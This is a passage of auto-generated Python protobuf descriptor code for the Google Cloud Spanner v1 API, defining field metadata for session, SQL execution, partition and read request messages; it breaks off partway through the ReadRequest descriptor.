_SESSION = _descriptor.Descriptor(
name="Session",
full_name="google.spanner.v1.Session",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.spanner.v1.Session.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="labels",
full_name="google.spanner.v1.Session.labels",
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="create_time",
full_name="google.spanner.v1.Session.create_time",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="approximate_last_use_time",
full_name="google.spanner.v1.Session.approximate_last_use_time",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_SESSION_LABELSENTRY],
enum_types=[],
serialized_options=_b(
"\352Aq\n\036spanner.googleapis.com/Session\022Oprojects/{project}/instances/{instance}/databases/{database}/sessions/{session}"
),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=902,
serialized_end=1258,
)
_GETSESSIONREQUEST = _descriptor.Descriptor(
name="GetSessionRequest",
full_name="google.spanner.v1.GetSessionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.spanner.v1.GetSessionRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1260,
serialized_end=1333,
)
_LISTSESSIONSREQUEST = _descriptor.Descriptor(
name="ListSessionsRequest",
full_name="google.spanner.v1.ListSessionsRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="database",
full_name="google.spanner.v1.ListSessionsRequest.database",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A!\n\037spanner.googleapis.com/Database"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_size",
full_name="google.spanner.v1.ListSessionsRequest.page_size",
index=1,
number=2,
type=5,
cpp_type=1,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="page_token",
full_name="google.spanner.v1.ListSessionsRequest.page_token",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="filter",
full_name="google.spanner.v1.ListSessionsRequest.filter",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1336,
serialized_end=1471,
)
_LISTSESSIONSRESPONSE = _descriptor.Descriptor(
name="ListSessionsResponse",
full_name="google.spanner.v1.ListSessionsResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="sessions",
full_name="google.spanner.v1.ListSessionsResponse.sessions",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="next_page_token",
full_name="google.spanner.v1.ListSessionsResponse.next_page_token",
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1473,
serialized_end=1566,
)
_DELETESESSIONREQUEST = _descriptor.Descriptor(
name="DeleteSessionRequest",
full_name="google.spanner.v1.DeleteSessionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="name",
full_name="google.spanner.v1.DeleteSessionRequest.name",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1568,
serialized_end=1644,
)
_EXECUTESQLREQUEST_QUERYOPTIONS = _descriptor.Descriptor(
name="QueryOptions",
full_name="google.spanner.v1.ExecuteSqlRequest.QueryOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="optimizer_version",
full_name="google.spanner.v1.ExecuteSqlRequest.QueryOptions.optimizer_version",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2124,
serialized_end=2165,
)
_EXECUTESQLREQUEST_PARAMTYPESENTRY = _descriptor.Descriptor(
name="ParamTypesEntry",
full_name="google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2167,
serialized_end=2241,
)
_EXECUTESQLREQUEST = _descriptor.Descriptor(
name="ExecuteSqlRequest",
full_name="google.spanner.v1.ExecuteSqlRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.ExecuteSqlRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.ExecuteSqlRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="sql",
full_name="google.spanner.v1.ExecuteSqlRequest.sql",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="params",
full_name="google.spanner.v1.ExecuteSqlRequest.params",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="param_types",
full_name="google.spanner.v1.ExecuteSqlRequest.param_types",
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="resume_token",
full_name="google.spanner.v1.ExecuteSqlRequest.resume_token",
index=5,
number=6,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query_mode",
full_name="google.spanner.v1.ExecuteSqlRequest.query_mode",
index=6,
number=7,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_token",
full_name="google.spanner.v1.ExecuteSqlRequest.partition_token",
index=7,
number=8,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="seqno",
full_name="google.spanner.v1.ExecuteSqlRequest.seqno",
index=8,
number=9,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="query_options",
full_name="google.spanner.v1.ExecuteSqlRequest.query_options",
index=9,
number=10,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_EXECUTESQLREQUEST_QUERYOPTIONS, _EXECUTESQLREQUEST_PARAMTYPESENTRY],
enum_types=[_EXECUTESQLREQUEST_QUERYMODE],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=1647,
serialized_end=2289,
)
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY = _descriptor.Descriptor(
name="ParamTypesEntry",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2167,
serialized_end=2241,
)
_EXECUTEBATCHDMLREQUEST_STATEMENT = _descriptor.Descriptor(
name="Statement",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="sql",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.sql",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="params",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.params",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="param_types",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.Statement.param_types",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2540,
serialized_end=2771,
)
_EXECUTEBATCHDMLREQUEST = _descriptor.Descriptor(
name="ExecuteBatchDmlRequest",
full_name="google.spanner.v1.ExecuteBatchDmlRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="statements",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.statements",
index=2,
number=3,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="seqno",
full_name="google.spanner.v1.ExecuteBatchDmlRequest.seqno",
index=3,
number=4,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_EXECUTEBATCHDMLREQUEST_STATEMENT],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2292,
serialized_end=2771,
)
_EXECUTEBATCHDMLRESPONSE = _descriptor.Descriptor(
name="ExecuteBatchDmlResponse",
full_name="google.spanner.v1.ExecuteBatchDmlResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="result_sets",
full_name="google.spanner.v1.ExecuteBatchDmlResponse.result_sets",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="status",
full_name="google.spanner.v1.ExecuteBatchDmlResponse.status",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2773,
serialized_end=2885,
)
_PARTITIONOPTIONS = _descriptor.Descriptor(
name="PartitionOptions",
full_name="google.spanner.v1.PartitionOptions",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="partition_size_bytes",
full_name="google.spanner.v1.PartitionOptions.partition_size_bytes",
index=0,
number=1,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="max_partitions",
full_name="google.spanner.v1.PartitionOptions.max_partitions",
index=1,
number=2,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2887,
serialized_end=2959,
)
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY = _descriptor.Descriptor(
name="ParamTypesEntry",
full_name="google.spanner.v1.PartitionQueryRequest.ParamTypesEntry",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="key",
full_name="google.spanner.v1.PartitionQueryRequest.ParamTypesEntry.key",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="value",
full_name="google.spanner.v1.PartitionQueryRequest.ParamTypesEntry.value",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=_b("8\001"),
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2167,
serialized_end=2241,
)
_PARTITIONQUERYREQUEST = _descriptor.Descriptor(
name="PartitionQueryRequest",
full_name="google.spanner.v1.PartitionQueryRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.PartitionQueryRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.PartitionQueryRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="sql",
full_name="google.spanner.v1.PartitionQueryRequest.sql",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="params",
full_name="google.spanner.v1.PartitionQueryRequest.params",
index=3,
number=4,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="param_types",
full_name="google.spanner.v1.PartitionQueryRequest.param_types",
index=4,
number=5,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_options",
full_name="google.spanner.v1.PartitionQueryRequest.partition_options",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[_PARTITIONQUERYREQUEST_PARAMTYPESENTRY],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=2962,
serialized_end=3381,
)
_PARTITIONREADREQUEST = _descriptor.Descriptor(
name="PartitionReadRequest",
full_name="google.spanner.v1.PartitionReadRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.PartitionReadRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.PartitionReadRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="table",
full_name="google.spanner.v1.PartitionReadRequest.table",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="index",
full_name="google.spanner.v1.PartitionReadRequest.index",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="columns",
full_name="google.spanner.v1.PartitionReadRequest.columns",
index=4,
number=5,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="key_set",
full_name="google.spanner.v1.PartitionReadRequest.key_set",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_options",
full_name="google.spanner.v1.PartitionReadRequest.partition_options",
index=6,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3384,
serialized_end=3689,
)
_PARTITION = _descriptor.Descriptor(
name="Partition",
full_name="google.spanner.v1.Partition",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="partition_token",
full_name="google.spanner.v1.Partition.partition_token",
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3691,
serialized_end=3727,
)
_PARTITIONRESPONSE = _descriptor.Descriptor(
name="PartitionResponse",
full_name="google.spanner.v1.PartitionResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="partitions",
full_name="google.spanner.v1.PartitionResponse.partitions",
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.PartitionResponse.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3729,
serialized_end=3851,
)
_READREQUEST = _descriptor.Descriptor(
name="ReadRequest",
full_name="google.spanner.v1.ReadRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.ReadRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction",
full_name="google.spanner.v1.ReadRequest.transaction",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="table",
full_name="google.spanner.v1.ReadRequest.table",
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="index",
full_name="google.spanner.v1.ReadRequest.index",
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="columns",
full_name="google.spanner.v1.ReadRequest.columns",
index=4,
number=5,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="key_set",
full_name="google.spanner.v1.ReadRequest.key_set",
index=5,
number=6,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="limit",
full_name="google.spanner.v1.ReadRequest.limit",
index=6,
number=8,
type=3,
cpp_type=2,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="resume_token",
full_name="google.spanner.v1.ReadRequest.resume_token",
index=7,
number=9,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="partition_token",
full_name="google.spanner.v1.ReadRequest.partition_token",
index=8,
number=10,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=3854,
